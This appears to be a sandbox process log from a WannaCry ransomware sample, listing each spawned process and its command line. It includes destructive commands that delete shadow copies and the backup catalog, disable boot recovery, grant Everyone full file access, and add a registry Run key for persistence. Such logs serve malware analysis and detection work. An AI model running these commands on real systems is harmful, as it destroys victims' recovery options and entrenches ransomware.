attrib.exe attrib +h .
2716
icacls.exe icacls . /grant Everyone:F /T /C /Q
2760
taskdl.exe taskdl.exe
2872
cscript.exe cscript.exe //nologo m.vbs
2980
taskhsvc.exe TaskData\Tor\taskhsvc.exe
2592
cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
2728
vssadmin.exe vssadmin delete shadows /all /quiet
2812
WMIC.exe wmic shadowcopy delete
3012
taskse.exe taskse.exe C:\Users\test22\AppData\Local\Temp\@WanaDecryptor@.exe
800
@WanaDecryptor@.exe @WanaDecryptor@.exe
284
cmd.exe cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "dhattnjpato996" /t REG_SZ /d "\"C:\Users\test22\AppData\Local\Temp\tasksche.exe\"" /f
1504
reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "dhattnjpato996" /t REG_SZ /d "\"C:\Users\test22\AppData\Local\Temp\tasksche.exe\"" /f
2300
taskdl.exe taskdl.exe
884
taskse.exe taskse.exe C:\Users\test22\AppData\Local\Temp\@WanaDecryptor@.exe
2780
@WanaDecryptor@.exe @WanaDecryptor@.exe
2708
taskdl.exe taskdl.exe
1080
taskse.exe taskse.exe C:\Users\test22\AppData\Local\Temp\@WanaDecryptor@.exe
1736
@WanaDecryptor@.exe @WanaDecryptor@.exe
1352
taskdl.exe taskdl.exe
2748
taskse.exe taskse.exe C:\Users\test22\AppData\Local\Temp\@WanaDecryptor@.exe
2124
@WanaDecryptor@.exe @WanaDecryptor@.exe
676
explorer.exe C:\Windows\Explorer.EXE
1452